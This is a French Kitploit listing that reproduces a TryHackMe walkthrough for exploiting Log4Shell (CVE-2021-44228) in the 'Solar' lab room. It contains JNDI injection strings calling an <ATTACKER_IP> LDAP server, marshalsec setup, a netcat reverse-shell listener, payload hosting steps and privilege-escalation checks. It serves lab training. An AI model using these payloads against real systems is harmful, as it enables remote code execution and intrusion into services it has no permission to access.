Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Solar-exploiting-log-4j — Procédure pas à pas TryHackMe pour l'exploitation de la vulnérabilité Log4Shell (CVE-2021-44228) afin d'obtenir une exécution de code à distance et de capturer des flags. | Kitploit
Outils/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationRétro-ingénierieExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

Procédure pas à pas TryHackMe pour l'exploitation de la vulnérabilité Log4Shell (CVE-2021-44228) afin d'obtenir une exécution de code à distance et de capturer des flags.

Voir le dépôt
211il y a 5 moisPas encore vérifié

🔥 Exploitation de Solar Log4j - Procédure TryHackMe

📌 Salle : Solar Exploiting Log4j

Plateforme : TryHackMe Difficulté : Moyenne Sujet : Log4Shell (Vulnérabilité Log4j)


🧠 Objectif

Exploiter la vulnérabilité Log4j (CVE-2021-44228) pour obtenir une exécution de code à distance et capturer les flags.


🛠️ Outils utilisés

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Serveur HTTP Python

🌐 Étape 1 : Reconnaissance

🔍 Scan de la cible

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Résultats

  • Ports ouverts : 80 (HTTP), d'autres selon la salle
  • Application web utilisant un backend basé sur Java

🌐 Étape 2 : Énumération web

  • Visiter l'application web dans le navigateur
  • Interagir avec les champs (connexion/recherche/en-têtes)
  • Capturer la requête avec Burp Suite

💥 Étape 3 : Identifier la vulnérabilité Log4j

La vulnérabilité Log4j permet l'injection JNDI :

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Si l'entrée est enregistrée → la vulnérabilité existe.


⚙️ Étape 4 : Mise en place de l'écouteur

Lancer Netcat

root@kitploit:~
nc -lvnp 4444

Démarrer un serveur LDAP malveillant (Exemple)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Exécuter le serveur LDAP :

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Étape 5 : Héberger la charge utile

root@kitploit:~
python3 -m http.server 8000

Créer une classe Java malveillante (Exploit.class)


🚀 Étape 6 : Déclencher l'exploit

Injecter la charge utile dans le champ vulnérable :

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Utiliser des en-têtes comme :

  • User-Agent
  • X-Api-Version

🖥️ Étape 7 : Obtenir un reverse shell

Une fois déclenché :

  • La cible se reconnecte à l'écouteur Netcat
  • Vous obtenez un accès shell

🔐 Étape 8 : Élévation de privilèges (si nécessaire)

Vérifier :

root@kitploit:~
sudo -l

Rechercher :

  • Binaires SUID mal configurés
  • Fichiers inscriptibles
  • Tâches cron

🚩 Étape 9 : Capturer les flags

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Concepts clés appris

  • Log4Shell (CVE-2021-44228)
  • Injection JNDI
  • Exécution de code à distance (RCE)
  • Reverse Shell
  • Exploitation web
Télécharger l’outil